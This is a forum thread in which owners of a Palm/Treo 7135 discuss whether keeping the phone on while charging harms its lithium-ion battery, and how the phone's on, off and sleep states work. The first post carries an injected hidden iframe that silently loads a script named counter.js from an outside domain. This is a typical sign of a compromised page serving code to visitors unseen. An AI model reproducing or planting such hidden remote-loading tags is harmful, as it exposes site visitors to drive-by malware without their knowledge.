+ Reply to Thread
    Assimilated

Phone on while charging?

First off, I have to admit I don't know JACK (tiger) about batteries. I've searched for related posts but haven't found anything this specific.

SO, my question is: if I leave the phone ON in the cradle (or on the travel charger when I'm traveling and sitting in roomy 3x3 cubicles), charging continuously, will that wear out the battery faster than if I let it charge overnight and then run down during the day? I've heard that some batteries have memory effect (is that only NiCD?) and I've noticed with some of my previous phones that if I left them on the charger while I used it all day, the battery eventually pooped out -- LONG before it should have. I know the 7135 comes with LiON -- what can I expect?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Tiger....JACK Tiger

Re: Phone on while charging?

Originally posted by JackTiger
    First off, I have to admit I don't know JACK (tiger) about batteries. I've searched for related posts but haven't found anything this specific.

SO, my question is: if I leave the phone ON in the cradle (or on the travel charger when I'm traveling and sitting in roomy 3x3 cubicles), charging continuously, will that wear out the battery faster than if I let it charge overnight and then run down during the day? I've heard that some batteries have memory effect (is that only NiCD?) and I've noticed with some of my previous phones that if I left them on the charger while I used it all day, the battery eventually pooped out -- LONG before it should have. I know the 7135 comes with LiON -- what can I expect?
    LiON has no memory effect. You should be able to leave the phone on and in the charger all of the time.

Alan

Administrator
    yes, alan is right. the only thing is that it will take longer for the phone to fully charge since you have it on. not much longer, but it will add a little more time to the overall charge cycle.

Assimilated
    Thanks for the info. The biggest reason for my question was my PERCEPTION that this was true with my old 6035. For a couple months, I would leave it on the charger all the time (I like that big desk clock) but it seemed like the battery wouldn't last as long BETWEEN charges whenever I had to take it out and move around. Thanks again.
    Tiger....JACK Tiger

Ok here's a dumb newbie question. What exactly is meant by "Phone is OFF" ? Does that mean that incoming calls will not ring and will go to voicemail instead?

Originally posted by jazmaan
    Ok here's a dumb newbie question. What exactly is meant by "Phone is OFF" ? Does that mean that incoming calls will not ring and will go to voicemail instead?
    That is correct. It means that the radio in the 7135 is turned off. It will not receive or send any transmissions in that mode. Battery life will be increased due to the lower power drain.

Assimilated
    As funny as it may sound, I had to actually explain this to a stewardess on one of my flights. She was convinced my phone was transmitting, even though I was only using the Palm functions. I spent 15 minutes explaining to her and she STILL made me put it away. I expect this type of thing will get worse now that the 7135 actually looks like a phone with the flip open...with my 6035, I could put my hand over the antenna and it at least looked like a Palm, not a phone.
    Tiger....JACK Tiger

Ok what about when the phone is "sleeping"? Will an incoming call wake it up?

Originally posted by jazmaan
    Ok what about when the phone is "sleeping"? Will an incoming call wake it up?
    The phone doesn't "sleep". It is on or off. The palm sleeps. Seperate power buttons even....

Alan

Originally posted by alanb
    The phone doesn't "sleep". It is on or off. The palm sleeps. Seperate power buttons even....

Alan
    Now here's something I didn't know. I was wondering if the phone takes time to "boot". My other cell phones have always taken a few seconds to start up. I was concerned that the 7135 would take a long time to start. When I need my Palm I want it NOW! I don't want to wait several seconds for it to start. It was that initial wait that caused me to jump ship from the Handheld PC (HP 620LX) to Palm several years ago.

I was just setting up my network prefs to surf the internet w/o Express network. While doing this I had the phone on vibrate. Several times during the process, the phone vibrated briefly even though there didn't seem to be any incoming call. What was that about?

Originally posted by michael1
    ... I was concerned that the 7135 would take a long time to start. When I need my Palm I want it NOW! I don't want to wait several seconds for it to start. It was that initial wait that caused me to jump ship from the Handheld PC (HP 620LX) to Palm several years ago.
    Open the flip and the Palm is on. No delay. You can set it so the phone is displayed when you open the flip, in that case, you'd have to press the home button first.

Andy

Administrator
    Originally posted by alanb

Alan
    the display will be "sleeping" but the phones RF side will be wide awake.

I have found that my 7135 gets longer battery life if I charge it ith the phone on. I haven't done any study to measure the difference. I'd be interested in hearing if you notice a difference.

poked back in
    Heh, by the time I get the phone on Sprint, it'll have a 12 hour battery life, perfect videos and skipfree mp3s...
    I propose a toast to you pioneers unbound by the man!

Leaving phone on cradle on charge ok even after its fully charged?

Is there an issue leaving it on the charger, and even playing around with it?

Dreaderus

Fully Converged
    The manual says it's okay and you can't overcharge the battery. FWIW
    From the Middle of the Sea ;-)

jeh
    Yes, it's ok, because once charging is complete it stops charging... it isn't "on charge" constantly.

This would be true for *any* LiOn battery. They have an internal IC to prevent overcharging.
    -Quick